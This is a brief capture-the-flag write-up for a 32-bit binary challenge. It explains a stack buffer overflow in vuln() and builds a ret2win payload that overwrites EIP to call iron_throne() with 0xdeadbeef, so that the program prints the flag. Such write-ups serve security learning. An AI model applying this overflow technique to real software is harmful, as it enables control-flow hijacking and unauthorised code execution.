Author: NightKing
A 32bit binary has been given.
Decompilation
Looking at the vuln() function..
We see there an scope of an buffer overflow as we can see that the read() function can take an input with a more input length(0x54) than the allocated memory(0x2c).
If we read the challenge description it is pretty clear that we have to find the iron throne.
And while decompiling/debugging we see an iron_throne() function.
Aahaa !!
We see that this iron_throne() is called with a parameter which is later checked to a number = -0x2152411 which translates as 0xdeadbeef
And then we are supposed to get the flag with system("cat flag.txt")
Crafting the exploit
payload = b'a'*44 as the required buffer
payload += b'x'*12 as padding required to reach the eip
payload += p32(elf.symbols["iron_throne"]) adding the address of the iron_throne()
payload += p32(0xdeadbeef)+p32(0xdeadbeef) the parameter of the function iron_throne() and the return address.